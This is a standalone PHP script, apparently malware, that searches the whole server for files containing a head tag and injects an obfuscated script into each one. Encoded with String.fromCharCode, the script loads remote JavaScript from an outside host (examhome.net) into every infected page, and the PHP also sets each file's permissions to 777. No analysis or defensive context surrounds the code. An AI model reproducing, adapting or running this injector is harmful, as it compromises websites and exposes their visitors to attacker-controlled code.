some.php

1. <?php $a = 'find / -type f -name "*" | xargs grep -rl "<head"';
2. $l1 = "<script language=javascript>eval(String.fromCharCode(118, 97, 114, 32, 115, 111, 109, 101, 115, 116, 114, 105, 110, 103, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 32, 115, 111, 109, 101, 115, 116, 114, 105, 110, 103, 46, 116, 121, 112, 101, 32, 61, 32, 39, 116, 101, 120, 116, 47, 106, 97, 118, 97, 115, 99, 114, 105, 112, 116, 39, 59, 32, 115, 111, 109, 101, 115, 116, 114, 105, 110, 103, 46, 97, 115, 121, 110, 99, 32, 61, 32, 116, 114, 117, 101, 59, 115, 111, 109, 101, 115, 116, 114, 105, 110, 103, 46, 115, 114, 99, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 49, 54, 44, 32, 49, 49, 54, 44, 32, 49, 49, 50, 44, 32, 49, 49, 53, 44, 32, 53, 56, 44, 32, 52, 55, 44, 32, 52, 55, 44, 32, 49, 48, 49, 44, 32, 49, 50, 48, 44, 32, 57, 55, 44, 32, 49, 48, 57, 44, 32, 49, 48, 52, 44, 32, 49, 49, 49, 44, 32, 49, 48, 57, 44, 32, 49, 48, 49, 44, 32, 52, 54, 44, 32, 49, 49, 48, 44, 32, 49, 48, 49, 44, 32, 49, 49, 54, 44, 32, 52, 55, 44, 32, 49, 49, 53, 44, 32, 49, 49, 54, 44, 32, 57, 55, 44, 32, 49, 49, 54, 44, 32, 52, 54, 44, 32, 49, 48, 54, 44, 32, 49, 49, 53, 44, 32, 54, 51, 44, 32, 49, 49, 56, 44, 32, 54, 49, 44, 32, 52, 57, 44, 32, 52, 54, 44, 32, 52, 56, 44, 32, 52, 54, 44, 32, 53, 53, 44, 32, 53, 53, 41, 59, 32, 32, 32, 118, 97, 114, 32, 97, 108, 108, 115, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 32, 118, 97, 114, 32, 110, 116, 51, 32, 61, 32, 116, 114, 117, 101, 59, 32, 102, 111, 114, 32, 40, 32, 118, 97, 114, 32, 105, 32, 61, 32, 97, 108, 108, 115, 46, 108, 101, 110, 103, 116, 104, 59, 32, 105, 45, 45, 59, 41, 32, 123, 32, 105, 102, 32, 40, 97, 108, 108, 115, 91, 105, 93, 46, 115, 114, 99, 46, 105, 110, 100, 101, 120, 79, 102, 40, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 49, 44, 32, 49, 50, 48, 44, 32, 57, 55, 44, 32, 49, 48, 57, 44, 32, 49, 48, 52, 44, 32, 49, 49, 49, 44, 32, 49, 48, 57, 44, 32, 49, 48, 49, 41, 41, 32, 62, 32, 45, 49, 41, 32, 123, 32, 110, 116, 51, 32, 61, 32, 102, 97, 108, 115, 101, 59, 125, 32, 125, 32, 105, 102, 40, 110, 116, 51, 32, 61, 61, 32, 116, 114, 117, 101, 41, 123, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 34, 104, 101, 97, 100, 34, 41, 91, 48, 93, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 115, 111, 109, 101, 115, 116, 114, 105, 110, 103, 41, 59, 32, 125));</script>";
3. $t = shell_exec($a);
4. $t = explode("\n", trim($t));
5. foreach($t as $f){
6.  
7. $g = file_get_contents($f);
8.     if (strpos($g, 'shell_exec') !== false) {
9.         continue;
10.     }
11. if (strpos($g, '115, 111, 109, 101, 115, 116, 114, 105, 110, 103') !== false) {
12.     $c4 = "103, 101, 116, 115, 116, 121, 112, 101, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101";
13.     $c5 = "103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101";
14.     $c6 = "99, 114, 101, 97, 116, 101, 115, 116, 121, 112, 101, 101, 110, 116";
15.     $c7 = "99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116";
16.     $g5 = str_replace($c4,$c5,$g);
17.     $g6 = str_replace($c6,$c7,$g5);
18.     @system("chmod 777 ".$f);
19.     @file_put_contents($f,$g6);
20.  
21.    echo "e:".$f;
22. } else {
23. $g = file_get_contents($f);
24. $g = str_replace("<head>","<head>".$l1,$g);
25. $g = str_replace("</head>",$l1."</head>",$g);
26. @system("chmod 777 ".$f);
27. @file_put_contents($f,$g);
28. $g = file_get_contents($f);
29. if (strpos($g, '115, 111, 109, 101, 115, 116, 114, 105, 110, 103') !== false) {
30.     $c4 = "103, 101, 116, 115, 116, 121, 112, 101, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101";
31.     $c5 = "103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101";
32.     $c6 = "99, 114, 101, 97, 116, 101, 115, 116, 121, 112, 101, 101, 110, 116";
33.     $c7 = "99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116";
34.     $g5 = str_replace($c4,$c5,$g);
35.     $g6 = str_replace($c6,$c7,$g5);
36.     @system("chmod 777 ".$f);
37.     @file_put_contents($f,$g6);
38.  
39.    echo $f;
40. }
41. }
42. }